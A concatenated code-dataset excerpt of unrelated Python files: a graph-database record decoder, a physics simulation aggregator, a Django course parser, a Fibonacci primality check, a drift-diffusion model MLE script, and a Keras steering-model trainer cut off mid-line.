'end_next_id': end_next_id,\n 'first_prop_id': first_prop_id}\n\n @staticmethod\n def decode_label_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes label data from a physical label record.\n Label record format:\n 1 byte `in_use` byte\n 4 bytes `dynamic_id` – pointer to first record with label data in dynamic storage\n Total: 5 bytes\n :param record: record object\n :return: a dictionary with parsed label data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n used = RecordDecoder._decode_bool(record[:1])\n dynamic_id = RecordDecoder._decode_int(record[1:5])\n\n return {'id': idx,\n 'used': used,\n 'dynamic_id': dynamic_id}\n\n @staticmethod\n def decode_property_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes property data from a physical property record.\n Property record format:\n 1 byte `in_use` byte\n 4 bytes `key_id` – pointer to key data in dynamic storage\n 4 bytes `value_id` – pointer to value data in dynamic storage\n 4 bytes `next_prop_id` – pointer to `id` of next property\n Total: 13 bytes\n :param record: record object\n :return: a dictionary with parsed property data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n used = RecordDecoder._decode_bool(record[:1])\n\n key_id = RecordDecoder._decode_int(record[1:5])\n assert key_id >= 0\n\n value_id = RecordDecoder._decode_int(record[5:9])\n assert value_id >= 0\n\n next_prop_id = RecordDecoder._decode_int(record[9:13])\n\n return {'id': idx,\n 'used': used,\n 'key_id': key_id,\n 'value_id': value_id,\n 'next_prop_id': next_prop_id}\n\n @staticmethod\n def decode_dynamic_data_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes dynamic data from a physical dynamic record.\n Dynamic record format:\n 1 byte number of bytes taken by data\n 27 bytes data\n 4 bytes pointer to `id` of next_chunk\n Total: 32 bytes\n :param record: record object\n :return: a dictionary with parsed dynamic data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n data_size = RecordDecoder._decode_int(record[:1])\n data = RecordDecoder._decode_str(record[1:data_size+1])\n next_chunk_id = RecordDecoder._decode_int(record[28:32])\n\n return {'id': idx,\n 'data': data,\n 'next_chunk_id': next_chunk_id}\n\n @staticmethod\n def _decode_int(data: bytes, n_bytes: int = 4) -> int:\n return int.from_bytes(data[:n_bytes], byteorder=BYTEORDER, signed=SIGNED)\n\n @staticmethod\n def _decode_bool(data: bytes, n_bytes: int = 1) -> bool:\n return bool.from_bytes(data[:n_bytes], byteorder=BYTEORDER, signed=SIGNED)\n\n @staticmethod\n def _decode_str(data: bytes) -> str:\n return data.decode(encoding=ENCODING)\n","sub_path":"src/graph_db/fs/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"81509506","text":"import json\nimport os\nimport sys\nimport math\nimport ROOT\n\n\nwavelength = sys.argv[1]\neffRun = sys.argv[2]\nthickness = sys.argv[3]\n\n#wavelength = 130\n#effRun = '0.715_AA'\n#thickness = 0.5\n\npathToDir = '/data/miniclean/data/VUV/data/'+str(wavelength)+'nm/'+str(effRun)+'/'+str(thickness)+'_um/pythonFiles/'\njsonFileNames = []\nrootFileNames = []\nfor aFileName in os.listdir(pathToDir):\n\tif '.json' in aFileName:\n\t\tjsonFileNames.append(aFileName)\n\tif '.root' in aFileName:\n\t\trootFileNames.append(aFileName)\n\nnumVisDetect = 0\nnumVisEscapeSample = 0\nnumVisEscapeDownstream = 0\nnumVisEscapeUpstream = 0\nnumVisEscapeSideways = 0\nnumVisCreatedByUV = 0\nnumVisCreatedByVis = 0\nnumPhotonsAbsTPB = 0\nnumUVPenetratedTPB = 0\nincidentUVPhotons = 0\n\nnumVisDetectFromVis = 0 \nnumVisDetectFromUV = 0\ntotalNumberOfVis = 0\n\ntest = 0\n\nfor iFile in range(len(jsonFileNames)):\n\ttempFilename = pathToDir+'sim_'+str(iFile).zfill(3)+'.json'\n\t#print tempFilename\n\ttempData = json.load(open(tempFilename,'r'))\n\n\tincidentUVPhotons += tempData['UVPhotonsPassThroughUpstream']\n\t\n\tfor aName in tempData['UVStepEndVolumes'].keys():\n\t\tif aName in ['tpbVolume','acrylicSampleDisk']:\n\t\t\tnumUVPenetratedTPB += tempData['UVStepEndVolumes'][aName]\n\n\tnumPhotonsAbsTPB += tempData['UVStepEndVolumes']['tpbVolume']\n\n\tnumVisCreatedByUV += tempData['VisPhotonsCreatedByParentUV']\n\tnumVisCreatedByVis += tempData['VisPhotonsNotCreatedByParentUV']\n\n\tfor aName in tempData['VisStepEndVolumes'].keys():\n\t\ttotalNumberOfVis += tempData['VisStepEndVolumes'][aName]\n\t\tif aName in ['tpbVolume','acrylicSampleDisk','downstreamTrackingDisk_substrate']:\n\t\t\tcontinue\n\t\telse:\n\t\t\tnumVisEscapeSample += tempData['VisStepEndVolumes'][aName]\n\n\ttry:\n\t\ttest += tempData['VisStepEndVolumes']['downstreamTrackingDisk_substrate']\n\texcept:\n\t\tpass\n\n\tnumVisEscapeDownstream += tempData['VisPhotonsEscDownstream']\n\tnumVisEscapeUpstream += tempData['VisPhotonsEscUpstream']\n\tnumVisEscapeSideways += tempData['VisPhotonsEscSideways']\n\n\tnumVisDetect += tempData['vis_detect_count']\n\n\tnumVisDetectFromVis += tempData['VisPhotonDetectedFromVis']\n\tnumVisDetectFromUV += tempData['VisPhotonDetectedFromUV']\n\nT_uv = float(numUVPenetratedTPB)/float(incidentUVPhotons)\nuT_uv = T_uv*math.sqrt( (math.sqrt(numUVPenetratedTPB)/numUVPenetratedTPB)**2 + (math.sqrt(incidentUVPhotons)/incidentUVPhotons)**2 )\n\nf_UV_abs = float(numPhotonsAbsTPB)/float(numUVPenetratedTPB)\nuf_UV_abs = f_UV_abs*math.sqrt( (math.sqrt(numPhotonsAbsTPB)/numPhotonsAbsTPB)**2 + (math.sqrt(numUVPenetratedTPB)/numUVPenetratedTPB)**2 )\n\ne_UV = float(numVisCreatedByUV)/float(numPhotonsAbsTPB)\nue_UV = math.sqrt( (math.sqrt(numVisCreatedByUV)/numVisCreatedByUV)**2 + (math.sqrt(numPhotonsAbsTPB)/numPhotonsAbsTPB)**2 )\n\ntotVisCreated = numVisCreatedByUV+numVisCreatedByVis\ne_tot = float(totVisCreated)/float(numPhotonsAbsTPB)\nue_tot = math.sqrt( (math.sqrt(totVisCreated)/totVisCreated)**2 + (math.sqrt(numPhotonsAbsTPB)/numPhotonsAbsTPB)**2 )\n\nf_vis_escape = float(numVisEscapeSample)/float(totVisCreated)\nuf_vis_escape = math.sqrt( (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 + (math.sqrt(totVisCreated)/totVisCreated)**2 )\n\nf_vis_fwd_escape = float(numVisEscapeDownstream)/float(numVisEscapeSample)\nuf_vis_fwd_escape = math.sqrt( (math.sqrt(numVisEscapeDownstream)/numVisEscapeDownstream)**2 + (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 )\n\nf_vis_bwd_escape = float(numVisEscapeUpstream)/float(numVisEscapeSample)\nuf_vis_bwd_escape = math.sqrt( (math.sqrt(numVisEscapeUpstream)/numVisEscapeUpstream)**2 + (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 )\n\nf_vis_side_escape = float(numVisEscapeSideways)/float(numVisEscapeSample)\nuf_vis_side_escape = math.sqrt( (math.sqrt(numVisEscapeSideways)/numVisEscapeSideways)**2 + (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 )\n\nf_visEsc_detect = float(numVisDetect)/float(numVisEscapeSample)\nuf_visEsc_detect = math.sqrt( (math.sqrt(numVisDetect)/numVisDetect)**2 + (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 )\n\nvics_g = float(numVisDetect)/float(incidentUVPhotons)\nuvics_g = math.sqrt( (math.sqrt(numVisDetect)/numVisDetect)**2 + (math.sqrt(incidentUVPhotons)/incidentUVPhotons)**2 )\n\nf_visDetect_fromVis = float(numVisCreatedByVis)/float(totVisCreated)\nif numVisCreatedByVis == 0:\n\tuf_visDetect_fromVis = 0\nelse:\n\tuf_visDetect_fromVis = math.sqrt( (math.sqrt(numVisCreatedByVis)/numVisCreatedByVis)**2 + (math.sqrt(totVisCreated)/totVisCreated)**2)\n\n# Some other interesting ratios/checksums\nf_visCreated_UVCreated = float(numVisCreatedByVis)/float(numVisCreatedByUV)\nf_visCreatedDetect_UVCreatedDetect = float(numVisDetectFromVis)/float(numVisDetectFromUV)\ntotalVisPhotonCheckSum = totalNumberOfVis - (numVisCreatedByUV + numVisCreatedByVis)\n\ndictOut = {'T_uv':T_uv,'uT_uv':uT_uv,'f_UV_abs':f_UV_abs,'uf_UV_abs':uf_UV_abs,'e_UV':e_UV,'ue_UV':ue_UV,'e_tot':e_tot,'ue_tot':ue_tot,'f_vis_escape':f_vis_escape,'uf_vis_escape':uf_vis_escape,\n\t\t 'f_visEsc_detect':f_visEsc_detect,'uf_visEsc_detect':uf_visEsc_detect,'f_vis_fwd_escape':f_vis_fwd_escape,'uf_vis_fwd_escape':uf_vis_fwd_escape,\n\t\t 'f_vis_bwd_escape':f_vis_bwd_escape,'uf_vis_bwd_escape':uf_vis_bwd_escape,'f_vis_side_escape':f_vis_side_escape,'uf_vis_side_escape':uf_vis_side_escape,\n\t\t 'numVisDetect':numVisDetect,'numVisEscapeSample':numVisEscapeSample,'numVisEscapeDownstream':numVisEscapeDownstream,'numVisEscapeUpstream':numVisEscapeUpstream,'numVisEscapeSideways':numVisEscapeSideways,\n\t\t 'numVisCreatedByUV':numVisCreatedByUV,'numVisCreatedByVis':numVisCreatedByVis,'numPhotonsAbsTPB':numPhotonsAbsTPB,'numUVPenetratedTPB':numUVPenetratedTPB,'incidentUVPhotons':incidentUVPhotons,\n\t\t 'numVisDetectFromVis':numVisDetectFromVis,'numVisDetectFromUV':numVisDetectFromUV,'totalNumberOfVis':totalNumberOfVis,\n\t\t 'vics_g':vics_g,'uvics_g':uvics_g,'f_visDetect_fromVis':f_visDetect_fromVis,'uf_visDetect_fromVis':uf_visDetect_fromVis}\n\nfileOut = open(pathToDir+'../concatOutput.json','w+')\njson.dump(dictOut,fileOut)\nfileOut.close()\n\n# Concat the root files\nhistNames = []\nhists = []\nfirstFile = None\nfor iFile in range(len(rootFileNames)):\n\tif iFile == 0:\n\t\tfirstFile = ROOT.TFile.Open(pathToDir+'sim_'+str(iFile).zfill(3)+'.root')\n\t\tfor keyName in firstFile.GetListOfKeys():\n\t\t\thistNames.append(keyName.GetName())\n\t\t\thists.append(firstFile.Get(keyName.GetName()))\n\telse:\n\t\ttempFile = ROOT.TFile.Open(pathToDir+'sim_'+str(iFile).zfill(3)+'.root')\n\t\tfor keyName in tempFile.GetListOfKeys():\n\t\t\ttempIndex = histNames.index(keyName.GetName())\n\t\t\thists[tempIndex].Add((tempFile.Get(keyName.GetName()).Clone()),1)\n\nrootFileOut = ROOT.TFile(pathToDir+'../concatPlotsOut.root','RECREATE')\nfor aHist in hists:\n\trootFileOut.WriteTObject(aHist)\nrootFileOut.Close()\n\n#math.sqrt( (math.sqrt()/)**2 + (math.sqrt()/)**2 )\n\n","sub_path":"geoFactorSim/newGeoSim/machineSweep/GAF/concatFractionsAndPlots.py","file_name":"concatFractionsAndPlots.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"263137277","text":"import chardet\nimport copy\nimport json\nimport logging\nimport re\nfrom datetime import date\nfrom lxml import etree\n\nfrom django.db import transaction\n\nfrom .. import models\n\nlogger = logging.getLogger('web')\n\ndef setCourse(filename):\n \"\"\"\n 解析课程文件并将需要的信息进行入库\n :param filename:\n :return:\n \"\"\"\n logger.debug('start set course')\n itemList = []\n try:\n with open('./display/courses/'+filename,'rb') as courseHtml:\n html = courseHtml.read()\n charset = chardet.detect(html[:500])['encoding']\n if charset == 'GB2312':\n try:\n text = html.decode('GBK')\n logger.debug('decode success')\n except Exception as e:\n logger.debug(charset+' decode error')\n logger.error(e)\n return False\n else:\n try:\n text = html.decode(charset)\n logger.debug('decode success')\n except Exception as e:\n logger.debug(charset+' decode error')\n logger.error(e)\n return False\n\n html = etree.HTML(text)\n\n htmlTr = html.xpath('//tr')\n delCN = re.compile(u'[^0-9\\-,,]')\n for dataHtml in htmlTr:\n item = models.Course()\n data = dataHtml.xpath('./td/text()')\n if len(data) < 7:\n continue\n if 'M' in data[6] or 'N' in data[6] or 'H' in data[6] or 'G' in data[6]:\n item.courseNo = data[0].strip()\n item.courseNum = data[1].strip()\n item.courseCredits = data[2].strip()\n item.courseName = data[3].strip()\n item.courseDepart = data[4].strip()\n item.instructor = data[5].strip()\n item.courseAddr = data[6].strip()\n item.courseDate = data[7].strip()\n item.courseSession = data[8].strip()\n week = data[9].strip()\n item.courseMax = data[10].strip()\n week = delCN.sub(r'',week)\n if ',' in week:\n weeks = week.split(',')\n for week in weeks:\n temp = models.Course()\n if '-' in week:\n weekList = week.split('-')\n item.startWeek = weekList[0]\n item.endWeek = weekList[1]\n else:\n item.startWeek = week\n item.endWeek = week\n temp = copy.deepcopy(item)\n itemList.append(temp)\n else:\n if '-' in week:\n weekList = week.split('-')\n item.startWeek = weekList[0]\n item.endWeek = weekList[1]\n else:\n item.startWeek = week\n item.endWeek = week\n itemList.append(item)\n else:\n continue\n\n except Exception as e:\n logger.error(e)\n logger.debug('open file error')\n return False\n\n try:\n with transaction.atomic(using='mysql'):\n models.Course.objects.all().delete()\n models.Course.objects.bulk_create(itemList)\n logger.info('course datas updata success')\n return True\n\n except Exception as e:\n logger.error(e)\n logger.debug('mysql modify error')\n return False\n\ndef getTodyCourse(addr):\n \"\"\"\n datas = Course.objects.filter(courseAddr__contains='M')\n .filter(startWeek__lte=7 ).filter(courseAddr__contains='303').exclude(endWeek__lte=6)\n :param addr:\n :return:\n \"\"\"\n try:\n config = models.Config.objects.get(myKey='startTime')\n except Exception as e:\n logger.error(e)\n logger.debug('config is not exit')\n status = 412\n data = 'config is not fund'\n return {'status':status,'data':json.dumps(data)}\n\n if len(addr) > 1:\n status = 400\n data = 'a error request'\n\n elif addr in 'MNGH':\n startDay = config.startTime\n today = date.today()\n result = (today - startDay).days\n day = result%7 + 1\n week = int(result/7) + 1\n items = models.Course.objects.filter(courseAddr__contains=addr)\\\n .filter(startWeek__lte=week).exclude(endWeek__lte=week-1)\\\n .filter(courseDate__contains=day)\n dataList = []\n for item in items:\n data = {\n 'courseNo':item.courseNo,\n 'courseNum':item.courseNum,\n 'courseCredits':item.courseCredits,\n 'courseName':item.courseName,\n 'courseDepart':item.courseDepart,\n 'instructor':item.instructor,\n 'courseAddr':item.courseAddr,\n 'courseDate':item.courseDate,\n 'courseSession':item.courseSession,\n 'startWeek':item.startWeek,\n 'endWeek':item.endWeek,\n 'courseMax':item.courseMax,\n }\n dataList.append(data)\n data = dataList\n status = 200\n else:\n status = 400\n data = 'it is a error request'\n return {'status':status,'data':json.dumps(data,ensure_ascii=False)}\n\n\ndef setConfig(startTime):\n try:\n item = models.Config()\n timeList = startTime.split('-') #为了测试放在这里,正确的应该放在with前\n with transaction.atomic(using='mysql'):\n models.Config.objects.get(myKey='startTime').delete()\n item.myKey = 'startTime'\n item.startTime = date(int(timeList[0]), int(timeList[1]), int(timeList[2]))\n item.save()\n return True\n except Exception as e:\n logger.error(e)\n return False\n\n\nif __name__ == '__main__':\n setCourse('2019spring-course.html')\n pass\n","sub_path":"Backend/tigaBackend/display/functions/Course.py","file_name":"Course.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"588095307","text":"def Fibonacci(x):\n if x==0:\n return 0\n elif x==1:\n return 1\n else:\n a , b = 0 , 1\n for i in range(x):\n a , b = b , a+b\n return a\n\n\n\ndef PrimeNum(x):\n if x==1:\n return False\n elif x==2:\n return True\n elif x>2:\n import random\n Used_a = []\n for i in range(20):\n while True:\n #making sure that those 20 random numbers will be different from each other.\n a=random.randint(1, 100000)\n acceptable=True\n for j in Used_a:\n if a==j:\n acceptable = False\n if acceptable==True:\n Used_a.append(a)\n break\n if ((a**x-a)%x!=0):\n return False\n return True\n\n\n\n#asking the user for input\nNumber = int(input(\"Give the fibonacci number you want: \"))\n\n\n\n# 0 is neither prime nor composite!\nif Number==0:\n print(\"It is NOT primary number!\")\nelse:\n FibNumber = Fibonacci(Number)\n if PrimeNum(FibNumber)==True:\n print(\"It is primary number!\")\n else:\n print(\"It is NOT primary number!\")\n","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"565244399","text":"# Load packages\nimport tensorflow as tf\nfrom tensorflow.python.client import device_lib\nfrom tensorflow import keras\nimport numpy as np\nimport pandas as pd\nimport os\nimport pickle\nimport time\nimport uuid\nimport scipy as scp\nimport scipy.stats as scps\nfrom scipy.optimize import differential_evolution\nfrom datetime import datetime\nimport yaml\n\n# Load my own functions\nimport keras_to_numpy as ktnp\nfrom kde_training_utilities import kde_load_data # Want to overcome\nimport cddm_data_simulation as cds\nimport boundary_functions as bf\n\n# SUPPORT FUNCTIONS ------------\ndef make_params(param_bounds = [], param_bounds_epsilon =[]):\n params = np.zeros(len(param_bounds))\n \n for i in range(len(params)):\n params[i] = np.random.uniform(low = param_bounds[i][0] + param_bounds_epsilon[i], high = param_bounds[i][1] - param_bounds_epsilon[i]) \n return params\n\n# def get_params_from_meta_data(file_path = ''):\n# # Loading meta data file (,,) (simulator output at this point)\n# tmp = pickle.load(open(file_path, 'rb'))[2]\n# params = []\n# # for loop makes use of common structure of simulator outputs across models\n# for key in tmp.keys():\n# # delta_t signifies start of simulator parameters that we don't care about for our purposes here\n# if key == 'delta_t':\n# break\n# # variance parameter not used thus far, others added\n# if key != 's':\n# params.append(key)\n# return params \n\ndef adjust_params_names_group(params = ['v', 'a', 'w'], \n params_bounds = [], \n params_bounds_epsilon= [],\n param_varies = [0, 0, 1],\n n_subjects = 3):\n params_adj = []\n params_bounds_adj = []\n params_bounds_epsilon_adj = []\n cnt = 0\n for p in params:\n if param_varies[cnt]:\n for i in range(n_subjects):\n params_adj.append(p + '_' + str(i))\n params_bounds_adj.append(params_bounds[cnt])\n params_bounds_epsilon_adj.append(params_bounds_epsilon[cnt])\n else:\n params_adj.append(p)\n params_bounds_adj.append(params_bounds[cnt])\n params_bounds_epsilon_adj.append(params_bounds_epsilon[cnt])\n cnt += 1\n return params_adj, params_bounds_adj, params_bounds_epsilon_adj\n\ndef make_data(param_bounds = [],\n param_bounds_epsilon = [],\n param_is_boundary_param = [0, 0, 1],\n param_names = ['v', 'a', 'w']):\n \n # Generate set of parameters\n tmp_params = make_params(param_bounds = param_bounds, param_bounds_epsilon = param_bounds_epsilon)\n\n # Define boundary parameters \n boundary_params = {}\n cnt = 0\n \n for param in parameter_names:\n if param_is_boundary_param[cnt]:\n boundary_params[param] = tmp_params[cnt]\n cnt += 1\n\n # Run model simulations: MANUAL INTERVENTION TD: AUTOMATE\n ddm_dat_tmp = cds.ddm_flexbound(v = tmp_params[param_names.index('v')],\n a = tmp_params[param_names.index('a')],\n w = tmp_params[param_names.index('w')],\n s = 1,\n delta_t = 0.001,\n max_t = 20,\n n_samples = n_samples,\n boundary_fun = boundary, # function of t (and potentially other parameters) that takes in (t, *args)\n boundary_multiplicative = boundary_multiplicative, # CAREFUL: CHECK IF BOUND\n boundary_params = boundary_params)\n\n data_np = np.concatenate([ddm_dat_tmp[0], ddm_dat_tmp[1]], axis = 1)\n return data_np, tmp_params\n\ndef make_data_group(param_bounds = [],\n param_bounds_epsilon = [],\n param_is_boundary_param = [0, 0, 1], \n params_ordered = ['v', 'a', 'w', 'node', 'theta'],\n param_varies = [0, 0, 1],\n params_names = ['v', 'a', 'w_0', 'w_1', 'w_2'],\n n_subjects = 3):\n \n # Generate set of parameters\n tmp_params_full = make_params(param_bounds = param_bounds, param_bounds_epsilon = param_bounds_epsilon)\n data = {}\n for i in range(n_subjects):\n tmp_params = ktnp.get_tmp_params(params = tmp_params_full,\n params_ordered = params_ordered,\n param_varies = param_varies,\n params_names = params_names,\n idx = i)\n \n # Define boundary parameters \n boundary_params = {}\n cnt = 0\n\n for param in parameter_names:\n if param_is_boundary_param[cnt]:\n boundary_params[param] = tmp_params[cnt]\n cnt += 1\n\n # Run model simulations: MANUAL INTERVENTION TD: AUTOMATE\n ddm_dat_tmp = cds.ddm_flexbound(v = tmp_params[params_ordered.index('v')],\n a = tmp_params[params_ordered.index('a')],\n w = tmp_params[params_ordered.index('w')],\n s = 1,\n delta_t = 0.01,\n max_t = 20,\n n_samples = n_samples,\n boundary_fun = boundary, # function of t (and potentially other parameters) that takes in (t, *args)\n boundary_multiplicative = boundary_multiplicative, # CAREFUL: CHECK IF BOUND IS MULTIPLICATIVE\n boundary_params = boundary_params)\n\n data[str(i)] = np.concatenate([ddm_dat_tmp[0], ddm_dat_tmp[1]], axis = 1)\n return data, tmp_params_full\n\n# -------------------------------\n\nif __name__ == \"__main__\":\n \n # Initializations -------------\n print('Running intialization ....')\n \n # Get configuration from yaml file\n print('Reading config file .... ')\n yaml_config_path = os.getcwd() + '/kde_mle_parallel.yaml' # MANUAL INTERVENTION\n with open(yaml_config_path, 'r') as stream:\n config_data = yaml.unsafe_load(stream)\n \n # Handle cuda business if necessary\n # Handle some cuda business (if desired to use cuda here..)\n if config_data['cuda_on']:\n print('Handle cuda business....') \n os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"3\"\n print(device_lib.list_local_devices())\n \n # Load Model\n print('Loading model .... ')\n model_dtype = config_data['model_dtype']\n \n if model_dtype == 'ckpt':\n model_path = config_data['model_path']\n ckpt_path = config_data['ckpt_path']\n model = keras.models.load_model(model_path)\n model.load_weights(ckpt_path)\n if model_dtype == 'h5':\n model_path = config_data['model_path']\n model = keras.models.load_model(model_path, custom_objects = {\"huber_loss\": tf.losses.huber_loss})\n \n # get network architecture for numpy forward pass (used in mle, coming from ktnp imported)\n weights, biases, activations = ktnp.extract_architecture(model)\n\n # LOAD CONFIG FILE INTO VARIABLES ----\n print('Setting parameters from config file .... ')\n n_runs = config_data['n_runs'] # number of mles to compute in main loop\n n_samples = config_data['n_samples'] # samples by run\n n_workers = config_data['n_workers'] # number of workers to choose for parallel mle\n save_mle_out = config_data['save_mle_out']\n mle_out_path = config_data['mle_out_path']\n param_bounds = config_data['param_bounds']\n param_bounds_epsilon = config_data['param_bounds_epsilon']\n parameter_names = config_data['param_names']\n param_varies = config_data['param_varies']\n param_is_boundary_param = config_data['param_is_boundary_param']\n meta_data_file_path = config_data['meta_data_file_path']\n n_subjects = config_data['n_subjects']\n boundary = eval(config_data['boundary'])\n boundary_multiplicative = config_data['boundary_multiplicative']\n network_trained_on_log = config_data['network_trained_on_log']\n \n # optimizer properties:\n de_optim_popsize = config_data['de_optim_popsize']\n \n # NOTE PARAMETERS: \n # WEIBULL: [v, a, w, node, shape, scale]\n # LINEAR COLLAPSE: [v, a, w, node, theta]\n # DDM: [v, a, w]\n # FULL_DDM: [v, a, w, dw, sdv]\n # LBA: [v_0, ..., v_n, A, b, s]\n \n print('Finishing up initialization .... ')\n\n # MAKE COLUMNS FOR OPTIMIZER RESULT TABLE ---------\n \n if n_subjects == 1:\n p_sim = []\n p_mle = []\n\n for parameter_name in parameter_names:\n p_sim.append(parameter_name + '_sim')\n p_mle.append(parameter_name + '_mle')\n\n my_optim_columns = p_sim + p_mle + ['n_samples']\n\n # Initialize the data frame in which to store optimizer results\n optim_results = pd.DataFrame(np.zeros((n_runs, len(my_optim_columns))), columns = my_optim_columns)\n optim_results.iloc[:, 2 * len(parameter_names)] = n_samples\n \n else:\n # get adjusted parameter vector which takes into account multiple subjects in parameter space\n parameter_names_adj, parameter_bounds_adj, parameter_bounds_epsilon_adj = adjust_params_names_group(\n params = parameter_names,\n params_bounds = param_bounds,\n params_bounds_epsilon = param_bounds_epsilon,\n param_varies = param_varies,\n n_subjects = n_subjects)\n\n p_sim = []\n p_mle = []\n\n for parameter_name in parameter_names_adj:\n p_sim.append(parameter_name + '_sim')\n p_mle.append(parameter_name + '_mle')\n\n my_optim_columns = p_sim + p_mle + ['n_samples']\n\n # Initialize the data frame in which to store optimizer results\n optim_results = pd.DataFrame(np.zeros((n_runs, len(my_optim_columns))), columns = my_optim_columns)\n optim_results.iloc[:, 2 * len(parameter_names_adj)] = n_samples\n \n # -----------------------------------------------------\n \n print('Start of MLE procedure .... ')\n # Main loop -------------------------------------------------------------\n for i in range(0, n_runs, 1): \n\n # Get start time\n start_time = time.time()\n \n if n_subjects == 1:\n # Make dataset\n data, tmp_params = make_data(param_bounds = param_bounds, \n param_bounds_epsilon = param_bounds_epsilon,\n param_is_boundary_param = param_is_boundary_param, \n param_names = parameter_names)\n \n # Print some info on run\n print('Parameters for run ' + str(i) + ': ')\n print(tmp_params)\n \n # Run optimizer\n out_parallel = differential_evolution(ktnp.log_p, \n bounds = param_bounds,\n args = (weights, biases, activations, data, network_trained_on_log),\n popsize = de_optim_popsize,\n disp = True, \n workers = n_workers)\n \n # Store results\n optim_results.iloc[i, :len(parameter_names)] = tmp_params \n optim_results.iloc[i, len(parameter_names):(2*len(parameter_names))] = out_parallel.x\n\n else:\n # Make dataset\n print(parameter_names)\n data, tmp_params = make_data_group(param_bounds = parameter_bounds_adj,\n param_bounds_epsilon = parameter_bounds_epsilon_adj,\n param_is_boundary_param = param_is_boundary_param,\n params_ordered = parameter_names,\n param_varies = param_varies,\n params_names = parameter_names_adj,\n n_subjects = n_subjects)\n \n # Print some info on run\n print('Parameters for run ' + str(i) + ': ')\n print(tmp_params)\n\n # Run optimizer\n out_parallel = differential_evolution(ktnp.group_log_p, \n bounds = parameter_bounds_adj,\n args = (weights, \n biases, \n activations, \n data, \n param_varies, \n parameter_names, \n parameter_names_adj,\n network_trained_on_log),\n popsize = de_optim_popsize,\n disp = True, \n workers = n_workers)\n # Store results\n optim_results.iloc[i, :len(parameter_names_adj)] = tmp_params # KEEP OUTSIDE OF MAKE_DATA CALL\n optim_results.iloc[i, len(parameter_names_adj):(2*len(parameter_names_adj))] = out_parallel.x\n\n print('Solution vector of current run: ')\n print(out_parallel.x)\n\n print('The run took: ')\n elapsed = time.time() - start_time\n print(time.strftime(\"%H:%M:%S\", time.gmtime(elapsed)))\n\n # ----------------------------------------------------------\n if save_mle_out:\n # Save optimization results to file\n optim_results.to_csv(mle_out_path + '/mle_results_' + uuid.uuid1().hex + '.csv')","sub_path":"deprecated/kde_mle_parallel.py","file_name":"kde_mle_parallel.py","file_ext":"py","file_size_in_byte":14584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"364903746","text":"import pandas as pd\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport matplotlib.image as mpimg\r\nimport math\r\nimport json\r\nimport h5py\r\nimport keras\r\nfrom keras.models import Sequential, Model\r\nfrom keras.layers import Convolution2D, Flatten, MaxPooling2D, Lambda, ELU\r\nfrom keras.layers.core import Dense, Dropout\r\nfrom keras.optimizers import Adam\r\nfrom keras.callbacks import Callback\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.regularizers import l2\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom sklearn.model_selection import train_test_split\r\n# loading dataset\r\ndf = pd.read_csv('interpolated.csv')\r\ndf.drop(['index','timestamp','width','height',\r\n 'lat','long','alt'], 1, inplace = True)\r\ndata = df.values\r\n# center, left and right cameras\r\nleft = []\r\nleft_steer = []\r\nright = []\r\nright_steer = []\r\ncenter = []\r\ncenter_steer = []\r\nfor i in range(len(df)):\r\n if df['frame_id'][i] == 'left_camera':\r\n left.append(df['filename'][i])\r\n left_steer.append(df['angle'][i])\r\n elif df['frame_id'][i] == 'right_camera':\r\n right.append(df['filename'][i])\r\n right_steer.append(df['angle'][i])\r\n elif df['frame_id'][i] == 'center_camera':\r\n center.append(df['filename'][i])\r\n center_steer.append(df['angle'][i])\r\n\r\n# 80:20 split\r\nnum_split = int(0.8*len(center))\r\n\r\nX_train = center[:num_split]\r\nX_validation = center[num_split:]\r\ny_train = center_steer[:num_split]\r\ny_validation = center_steer[num_split:]\r\n\r\n# Only the images from center camera have been used\r\n# current steering angle\r\n# difference between current and future image\r\n\r\n# Model Hyperparameters\r\nPROCESSED_IMG_ROWS = 66\r\nPROCESSED_IMG_COLS = 200\r\nPROCESSED_IMG_CHANNELS = 3\r\nBATCH_SIZE = 64\r\nNB_EPOCH = 10\r\nFUTURE_INDEX = 20\r\n# function to crop and resize\r\ndef im_crop_resize(image):\r\n image = image[-240 :,:,:]\r\n image = cv2.resize(image, (PROCESSED_IMG_COLS,PROCESSED_IMG_ROWS), interpolation = cv2.INTER_AREA)\r\n return image \r\n\r\ndef load_and_augment_image(image_file):\r\n image = mpimg.imread(image_file)\r\n image = im_crop_resize(image)\r\n return image\r\n\r\nrandom.seed(7)\r\ngenerated_steering_angles = []\r\ndef generate_batch_data(image_data, steering_data, batch_size = BATCH_SIZE, future_index = FUTURE_INDEX):\r\n batch_images = np.empty([batch_size, PROCESSED_IMG_ROWS, PROCESSED_IMG_COLS, PROCESSED_IMG_CHANNELS])\r\n batch_images.astype('uint8')\r\n batch_steering = np.zeros(batch_size)\r\n \r\n while 1:\r\n for batch_index in range(batch_size):\r\n row_index = np.random.randint(len(image_data))\r\n steer_angle = steering_data[row_index]\r\n if row_index >= (len(image_data) - future_index):\r\n row_index = len(image_data) - row_index\r\n image1 = 